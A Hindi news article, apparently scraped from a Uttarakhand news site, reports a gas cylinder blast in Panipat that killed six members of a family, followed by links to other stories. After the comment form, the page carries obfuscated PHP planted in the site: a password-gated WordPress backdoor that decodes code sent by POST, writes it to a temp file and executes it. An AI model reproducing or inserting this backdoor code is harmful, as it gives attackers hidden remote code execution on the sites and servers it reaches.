हरियाणा में सिलेंडर ब्लास्ट: परिवार के 6 लोग जिंदा जले, मरने वालों में पति पत्नी और चार बच्चे शामिल

Uttarakhand Press News, 12 January 2023: पानीपत: वीरवार को तहसील कैंप पानीपत में सिलेंडर ब्लास्ट (cylinder blast in panipat) हो गया. घर में सिलेंडर में आग लगने से पति पत्नी समेत चार बच्चों की जिंदा जलने से मौत हो गई. मरने वालों में अब्दुल करीम (50 साल), अफरोजा (46 साल), इशरत खातून (18 साल), रेशमा (17 साल), अफान (7 साल) और अब्दुल शकुर (10 साल) शामिल हैं. ये सभी मूल रूप से पश्चिम बंगाल के उत्तर दिनाजपुर जिले के रहने वाले बताए जा रहे हैं. करीब डेढ़ साल पहले ही ये परिवार पानीपत तहसील कैंप में आकर बसा था. यहां पति पत्नी दोनों मजदूरी कर परिवार का भरन पोषण करते थे.

खबर है कि परिवार का मुखिया अब्दुल करीम और उसकी पत्नी अफरोजा अपने दो बेटों के साथ पहले से ही पानीपत में रहते थे. उनकी दोनों बेटियां वेस्ट बंगाल में रहती थीं. करीब एक महीने पहले दोनों बेटियों को यहां बुलाया गया था, क्योंकि अब्दुल करीम अपनी बड़ी बेटी इशरत खातून की शादी पानीपत में करना चाहता था. रविवार को लड़के वाले इशरत खातून को देखने के लिए आने वाले थे. डीएसपी धर्मवीर ने बताया कि पहली नजर में लग रहा है कि गैस लीक होने की वजह से ये हादसा हुआ है. गैस लीक होने की वजह से पूरे कमरे में फैल गई थी. जैसे ही सुबह गैस जलाने की कोशिश की तो ये हादसा हो गया.

पानीपत के डीएसपी धर्मवीर ने बताया कि फिलहाल सभी के शवों को पोस्टमार्टम के लिए पानीपत सिविल अस्पताल भिजवा दिया है. पोस्टमार्टम की रिपोर्ट के आने के बाद मौत की बाकी वजहों का पता चल पाएगा. उन्होंने कहा कि मामले में गहना से जांच की जा रही है. फिलहाल आसपास के लोगों को पूछताछ की जा रही है. इससे पहले भी सोमवार को हरियाणा के रेवाड़ी जिले से सिलेंडर ब्लास्ट की खबर सामने आई थी. जिसमें करीब सात झुग्गियां जलकर राख हो गई थी. सोमवार को बावल रोड स्थित करनावास गांव रेवाड़ी में सिलेंडर ब्लास्ट (cylinder blast in rewari) हो गया था. गनीमत रही कि इस हादसे में कोई हताहत नहीं हुआ.

Read Previous

सेक्सटॉर्शन दून: महिला ने वीडियो कॉल पर की अश्लील हरकत, ब्लैकमेल करके लाखों रुपए की ठगी, पुलिस ने मामला दर्ज कर शुरू की जांच

Read Next

उत्तराखंड: जेई, एई और प्रवक्ता भर्ती परीक्षाओं के भी पेपर लीक, STF जल्द कर सकती है बड़े खुलासे

Leave a Reply

Your email address will not be published. Required fields are marked *

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}